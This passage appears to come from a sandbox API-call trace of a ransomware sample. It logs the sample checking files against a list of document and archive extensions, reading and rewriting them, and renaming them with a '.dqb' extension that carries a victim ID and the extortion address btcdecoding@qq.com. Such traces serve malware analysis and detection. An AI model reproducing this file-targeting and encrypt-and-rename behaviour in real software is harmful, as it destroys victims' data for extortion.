Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0272.103] lstrlenW (lpString=".doc") returned 4 [0272.103] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0272.103] lstrlenW (lpString=".docx") returned 5 [0272.103] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0272.103] lstrlenW (lpString=".pdf") returned 4 [0272.103] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0272.103] lstrlenW (lpString=".xls") returned 4 [0272.103] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0272.103] lstrlenW (lpString=".xlsx") returned 5 [0272.103] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0272.103] lstrlenW (lpString=".ppt") returned 4 [0272.103] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0272.103] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0272.104] lstrlenW (lpString=".zip") returned 4 [0272.104] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0272.104] lstrlenW (lpString=".rar") returned 4 [0272.104] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0272.104] lstrlenW (lpString=".bz2") returned 4 [0272.104] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0272.104] lstrlenW (lpString=".7z") returned 3 [0272.104] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0272.104] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0272.104] lstrlenW (lpString=".dbf") returned 4 [0272.104] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0272.104] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0272.104] lstrlenW (lpString=".1cd") returned 4 [0272.104] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0272.104] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0272.104] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0272.104] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0272.104] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0272.104] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0272.104] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0272.104] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0272.104] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0272.104] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0272.104] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0272.104] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0272.104] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0272.105] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0272.105] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0272.105] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0272.105] lstrcmpiW (lpString1=".wmv", lpString2=".dqb") returned 1 [0272.105] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.105] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=1613606) returned 1 [0272.105] CloseHandle (hObject=0x31c) returned 1 [0272.105] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv")) returned 0x20 [0272.105] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.105] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0272.105] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0272.105] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0272.105] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0272.105] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0272.106] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0272.106] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0272.106] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0272.106] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0272.106] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0272.107] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0272.107] lstrcmpiW (lpString1=".wmv", lpString2=".dqb") returned 1 [0272.107] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.107] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=6717684) returned 1 [0272.107] CloseHandle (hObject=0x31c) returned 1 [0272.107] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv")) returned 0x20 [0272.107] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.107] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0272.107] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0272.107] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0272.107] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0272.107] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0272.107] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0272.107] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0272.108] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0272.108] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0272.108] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0272.108] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0272.109] lstrcmpiW (lpString1=".wmv", lpString2=".dqb") returned 1 [0272.109] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0272.274] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=6765684) returned 1 [0272.274] CloseHandle (hObject=0x324) returned 1 [0272.274] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv")) returned 0x20 [0272.279] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.286] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0274.932] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.933] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.933] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00202_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0274.933] GetLastError () returned 0x0 [0274.933] ReadFile (in: hFile=0x330, lpBuffer=0x3b00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e8fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b00020*, lpNumberOfBytesRead=0x2e8fed4*=0x1b1a, lpOverlapped=0x0) returned 1 [0274.950] WriteFile (in: hFile=0x2d4, lpBuffer=0x3b00020*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0x2e8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b00020*, lpNumberOfBytesWritten=0x2e8fc9c*=0x1b20, lpOverlapped=0x0) returned 1 [0274.955] ReadFile (in: hFile=0x330, lpBuffer=0x3b00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e8fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b00020*, lpNumberOfBytesRead=0x2e8fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.955] WriteFile (in: hFile=0x2d4, lpBuffer=0x3b00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b00020*, lpNumberOfBytesWritten=0x2e8fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.955] SetEndOfFile (hFile=0x2d4) returned 1 [0274.955] CloseHandle (hObject=0x2d4) returned 1 [0274.955] SetFilePointerEx (in: hFile=0x330, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.955] SetEndOfFile (hFile=0x330) returned 1 [0274.972] CloseHandle (hObject=0x330) returned 1 [0274.972] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) Thread: id = 96 os_tid = 0x66c [0268.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3a10050 [0268.603] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10000) returned 0x3a20058 [0268.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634f88 [0268.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x6619e0 [0268.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634fa0 [0268.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100000) returned 0x3c10020 [0268.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634fb8 [0268.604] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634fb8, Size=0x20) returned 0x65b828 [0268.604] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x634fb8 [0268.604] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x634fb8, Size=0x20) returned 0x65b800 [0268.604] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e20000 [0268.604] GetProcAddress (hModule=0x76e20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76e4d650 [0268.604] Wow64DisableWow64FsRedirection (in: OldValue=0x2fcff58 | out: OldValue=0x2fcff58*=0x0) returned 1 [0268.604] lstrlenW (lpString="kernel32.dll") returned 12 [0268.604] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65b828 | out: hHeap=0x5e0000) returned 1 [0268.604] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0268.604] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x65b800 | out: hHeap=0x5e0000) returned 1 [0268.604] Sleep (dwMilliseconds=0x64) [0268.984] Sleep (dwMilliseconds=0x64) [0269.252] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0269.252] lstrlenW (lpString="Alphabet.xml") returned 12 [0269.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0269.362] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=791686) returned 1 [0269.362] CloseHandle (hObject=0x1f4) returned 1 [0269.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml")) returned 0x20 [0269.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.362] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0269.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0269.362] lstrlenW (lpString=".doc") returned 4 [0269.362] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0269.362] lstrlenW (lpString=".docx") returned 5 [0269.362] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0269.362] lstrlenW (lpString=".pdf") returned 4 [0269.362] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0269.362] lstrlenW (lpString=".xls") returned 4 [0269.362] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0269.362] lstrlenW (lpString=".xlsx") returned 5 [0269.362] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0269.362] lstrlenW (lpString=".ppt") returned 4 [0269.362] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0269.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0269.362] lstrlenW (lpString=".zip") returned 4 [0269.362] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0269.362] lstrlenW (lpString=".rar") returned 4 [0269.362] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0269.363] lstrlenW (lpString=".bz2") returned 4 [0269.363] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0269.363] lstrlenW (lpString=".7z") returned 3 [0269.363] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0269.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0269.363] lstrlenW (lpString=".dbf") returned 4 [0269.363] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0269.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0269.363] lstrlenW (lpString=".1cd") returned 4 [0269.363] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0269.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0269.363] lstrlenW (lpString=".jpg") returned 4 [0269.363] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0269.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0269.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0269.363] lstrlenW (lpString=".doc") returned 4 [0269.363] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0269.363] lstrlenW (lpString=".docx") returned 5 [0269.363] lstrcmpiW (lpString1=".docx", lpString2="t.xml") returned -1 [0269.363] lstrlenW (lpString=".pdf") returned 4 [0269.363] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0269.363] lstrlenW (lpString=".xls") returned 4 [0269.363] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0269.363] lstrlenW (lpString=".xlsx") returned 5 [0269.363] lstrcmpiW (lpString1=".xlsx", lpString2="t.xml") returned -1 [0269.363] lstrlenW (lpString=".ppt") returned 4 [0269.363] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0269.363] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0269.363] lstrlenW (lpString=".zip") returned 4 [0269.363] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0269.363] lstrlenW (lpString=".rar") returned 4 [0269.363] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0269.363] lstrlenW (lpString=".bz2") returned 4 [0269.364] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0269.364] lstrlenW (lpString=".7z") returned 3 [0269.364] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0269.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0269.364] lstrlenW (lpString=".dbf") returned 4 [0269.364] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0269.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0269.364] lstrlenW (lpString=".1cd") returned 4 [0269.364] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0269.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned 63 [0269.364] lstrlenW (lpString=".jpg") returned 4 [0269.364] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0269.364] lstrcmpiW (lpString1=".avi", lpString2=".dqb") returned -1 [0269.364] lstrlenW (lpString="boxed-correct.avi") returned 17 [0269.364] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0269.364] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2fcff1c | out: lpFileSize=0x2fcff1c*=89600) returned 1 [0269.364] CloseHandle (hObject=0x1f4) returned 1 [0269.364] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi")) returned 0x20 [0269.364] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0269.364] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\boxed-correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0269.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0269.364] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0269.365] lstrlenW (lpString=".doc") returned 4 [0269.365] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.365] lstrlenW (lpString=".docx") returned 5 [0269.365] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0269.365] lstrlenW (lpString=".pdf") returned 4 [0269.365] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.365] lstrlenW (lpString=".xls") returned 4 [0269.365] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.365] lstrlenW (lpString=".xlsx") returned 5 [0269.365] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0269.365] lstrlenW (lpString=".ppt") returned 4 [0269.365] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0269.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0269.365] lstrlenW (lpString=".zip") returned 4 [0269.365] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0269.365] lstrlenW (lpString=".rar") returned 4 [0269.365] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0269.365] lstrlenW (lpString=".bz2") returned 4 [0269.365] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0269.365] lstrlenW (lpString=".7z") returned 3 [0269.365] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0269.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0269.365] lstrlenW (lpString=".dbf") returned 4 [0269.365] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0269.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0269.365] lstrlenW (lpString=".1cd") returned 4 [0269.365] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0269.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0269.365] lstrlenW (lpString=".jpg") returned 4 [0269.365] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0269.365] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0269.366] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-correct.avi") returned 74 [0269.366] lstrlenW (lpString=".doc") returned 4 [0269.366] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0269.366] lstrlenW (lpString=".docx") returned 5 [0269.366] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0269.366] lstrlenW (lpString=".pdf") returned 4 [0269.366] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0269.366] lstrlenW (lpString=".xls") returned 4 [0269.366] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0269.366] lstrlenW (lpString=".xlsx") returned 5 [0269.366] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0269.366] lstrlenW (lpString=".ppt") returned 4 [0269.366] 